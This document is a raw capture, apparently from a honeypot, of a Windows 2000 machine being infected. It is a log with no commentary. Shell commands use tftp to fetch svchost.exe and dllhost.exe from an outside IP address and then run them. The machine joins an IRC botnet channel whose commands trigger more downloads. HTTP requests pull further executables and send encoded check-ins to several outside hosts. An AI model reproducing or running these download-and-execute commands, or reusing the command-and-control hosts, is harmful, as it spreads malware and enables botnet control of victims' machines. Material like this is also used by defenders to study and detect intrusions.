VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 175.113.174.59 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	Transfer successful: 29184 bytes in 9 seconds, 3242 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 175.113.174.59 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	Transfer successful: 19968 bytes in 6 seconds, 3328 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK nreavggnUSER b020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG nreavggn :!get http:/sb.letmedo.net:2012/p/out/kp.exe:u. PRIVMSG nreavggn :!get http:/netnetnet1.com/sd7.txt 
VICTIM:  	GET /p/out/kp.exe HTTP/1.0User-Agent: DownloadHost: sb.letmedo.net:2012Pragma: no-cache 
ATTACKER:	GET /sd7.txt HTTP/1.0User-Agent: DownloadHost: netnetnet1.comPragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.5671961 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2F69F5DCEECA825FF3F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=3.414333E-03 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /temp/3431.exe?t=0.9155237 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: netnetnet1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=0D130EEA51C124F7869ABE942F6A06C3B378053F3211AF31DEBA5123248D97BA3248759E9CF3C4A52A4D4CD31705908949B1A0164A3BAE8B0C6C4AE0B7CA68191C519A3D7FA72AB5C9F3F9837799449BB443CCF17D03ECEACB699CF10DE782FB7B2A74650F2F18B720938B0CF3F332A8C136230C0047CAEDFAA3B1DEE95F982639303E9AA29490502D180D5871B2AB2F&t=0.3868982 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /hn.gif?t=0.7115442 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: hn.yigeyuming.com:82Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=829C1FFB08987DD943AA7851763E14D71E843E56554A1DDA4B292463A3047558BEC394792E127D20E78C9708EFE61EF69C56F6119A3B0A22546C9EE37309443795DA493D63B7E27DAF955B214BA511CEAB5C0A3798E65B5D7FDDC2AF18F2255C83D2C8D90C2C7CD3299A1D9A7E7E118BE81FA58AD59281A6792088E7A610DA644643D97CCDE25B9F20167625BD797CF8&t=0.6846277 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5648A246E272AB78EAF6CBE1FBBEE520E62D162CA380950B2044CEBC862F0429C7BD38D36B043051F790D14E667429308A72D86E4F3EBB9E32520CA6720F4D3CC489B71088500996D7EDEB91E6083EE18E790C31F58B0204B2108EE3E2081B620455001197B7208FD1624ADCE910DB53C633336D1340F2C00612265363C1C63C7A6A359133019C5F68525E0C1BDAFA7B4897&t=0.8268396 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sedsed1.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=445A8F6BA737A60245AC48618EC6FD3E5EC4DAB27A658E49E587DA9DFF58B69B90EDB35E28145B067D169B04A6AF7F9775BFC6212E8F153D7149D9A41C6613605D12A1D55C88C8571D27057F8A6470AFCE393904582606004EEC355831DB5920FEAF66771B3B62CDC675A335E21BD55D5AAF623C7320F6C4BCA82C598624AE5402124EE880B3DE165A60D2879750F3734B90&t=0.4558679 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /gggg_r.jpg?t=0.1450006 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 61.147.99.179:81Connection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /+11234.html HTTP/1.1UA-CPU: x86Accept-Language: en-usCB2: 1Accept-Encoding: gzip, deflateUser-Agent: MozillaHost: 112.168.240.193 
VICTIM:  	HTTP/1.0 200 OKYES 
ATTACKER:	GET /temp/int.exe?t=0.4587976 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: netnetnet1.comConnection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /+11234.html HTTP/1.1Accept: */*Accept-Language: en-usCB2: 1Accept-Encoding: gzip, deflateUser-Agent: MozillaHost: 190.29.216.48 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu